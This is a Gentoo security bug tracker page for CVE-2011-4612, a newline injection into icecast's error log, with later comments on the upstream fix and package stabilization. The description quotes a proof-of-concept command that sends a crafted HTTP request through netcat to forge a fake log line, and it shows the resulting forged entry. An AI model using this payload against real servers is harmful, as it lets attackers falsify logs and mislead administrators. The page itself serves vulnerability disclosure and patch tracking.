Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 394847 (CVE-2011-4612) - <net-misc/icecast-2.3.3: new line injection into log (CVE-2011-4612)
Summary: <net-misc/icecast-2.3.3: new line injection into log (CVE-2011-4612)
Alias: CVE-2011-4612
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor (vote)
Assignee: Gentoo Security
Whiteboard: B4 [glsa]
Depends on: 430434
  Show dependency tree
Reported: 2011-12-15 19:08 UTC by Petr Pisar
Modified: 2012-11-20 12:51 UTC (History)
3 users (show)

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Petr Pisar 2011-12-15 19:08:02 UTC
Jamie Strandboge <> reported to icecast developers (CCing <>) about possibility to inject fake message into icecast error log by specially crafted HTTP request sent to icecast server port discovered by Moritz Naumann:

"Newline injection in error.log

Running this command against an icecast2 running on

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 8000
> /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny


Upstream responded fixing 2.3.3 version would be released soon.
Comment 1 Tim Sammut (RETIRED) gentoo-dev 2011-12-15 20:54:20 UTC
Thanks for the bug, Petr.
Comment 2 Michael Harrison 2011-12-15 22:45:24 UTC
I was able to reproduce the fake log file with the same info as referenced here:

netcat must be installed of course
Comment 3 Oleg Gawriloff 2012-07-10 10:24:22 UTC
Any news? Because 2.3.3 is released.
Comment 4 Petr Pisar 2012-07-10 16:58:54 UTC
The 2.3.3 fixes this issue:

r18355 | dm8tbr | 2012-06-07 17:57:11 +0200 (Čt, 07 čen 2012) | 3 lines
This is part of the patch-set addressing CVE-2011-4612.
Comment 5 Markos Chandras (RETIRED) gentoo-dev 2012-08-06 19:30:58 UTC
2.3.3 now in portage. I can only do a limited testing on my webserver so please give it a try (or please ATs, test as much as you can) before marking it stable.
Comment 6 Sean Amoss (RETIRED) gentoo-dev Security 2012-08-07 22:02:48 UTC
(In reply to comment #5)
> 2.3.3 now in portage. I can only do a limited testing on my webserver so
> please give it a try (or please ATs, test as much as you can) before marking
> it stable.

Thanks, Markos.

Arches, please test and mark stable:
Target KEYWORDS: "alpha amd64 ppc ppc64 sparc x86"
Comment 7 Andreas Schürch gentoo-dev 2012-08-08 11:59:13 UTC
I stumbled upon bug 430434.
Comment 8 Andreas Schürch gentoo-dev 2012-08-09 12:01:57 UTC
x86 done, thanks!
Comment 9 Brent Baude (RETIRED) gentoo-dev 2012-08-09 18:21:45 UTC
ppc done
Comment 10 Markos Chandras (RETIRED) gentoo-dev 2012-08-09 20:47:52 UTC
amd64 done
Comment 11 Raúl Porcel (RETIRED) gentoo-dev 2012-08-26 14:12:07 UTC
alpha/sparc keywords dropped
Comment 12 Kacper Kowalik (Xarthisius) (RETIRED) gentoo-dev 2012-09-18 10:09:50 UTC
+  18 Sep 2012; Kacper Kowalik <> icecast-2.3.3.ebuild:
+  ppc64 stable wrt #394847, add missing inherit of user.eclass and explicit

ppc64 stable, last arch done
Comment 13 Sean Amoss (RETIRED) gentoo-dev Security 2012-09-18 18:53:13 UTC
Thanks, everyone. 

GLSA vote: no.
Comment 14 Tim Sammut (RETIRED) gentoo-dev 2012-09-20 23:49:21 UTC
Thanks, folks. GLSA Vote: No, tool, closing.
Comment 15 GLSAMaker/CVETool Bot gentoo-dev 2012-11-20 12:51:11 UTC
CVE-2011-4612 (
  icecast before 2.3.3 allows remote attackers to inject control characters
  such as newlines into the error loc (error.log) via a crafted URL.